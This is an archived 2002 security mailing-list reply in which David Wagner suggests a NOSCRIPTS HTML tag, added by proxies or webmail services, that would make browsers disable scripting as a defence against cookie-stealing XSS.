Re: A technique to mitigate cookie-stealing XSS attacks

From: David Wagner (dawat_private)
Date: Thu Nov 07 2002 - 20:23:56 PST

Next message: Michael Howard: "RE: A technique to mitigate cookie-stealing XSS attacks"

Previous message: Mandrake Linux Security Team: "MDKSA-2002:075 - nss_ldap update"
Next in thread: Michael Howard: "RE: A technique to mitigate cookie-stealing XSS attacks"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Florian Weimer  wrote:
>What about HTTP headers which advise user agents to disable some
>features, e.g. read/write access to the document or parts of it via
>scripting or other Internet Explorer interfaces?

HTTP headers are arguably the wrong place, but it might make sense to
have a <NOSCRIPTS> tag that would require the browser to turn off all
scripting for the entire HTML document, or somesuch.  For instance,
application-layer proxies could add such a tag to all data crossing the
firewall, and places like Hotmail prepend such a tag to all HTML-formatted
email they receive before displaying it to the user.  Of course, we would
have to trust browsers to respect such a tag, but it could potentially
give a very simple, high-assurance way to turn off dangerous features.

Next message: Michael Howard: "RE: A technique to mitigate cookie-stealing XSS attacks"
Previous message: Mandrake Linux Security Team: "MDKSA-2002:075 - nss_ldap update"
Next in thread: Michael Howard: "RE: A technique to mitigate cookie-stealing XSS attacks"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Nov 08 2002 - 20:14:13 PST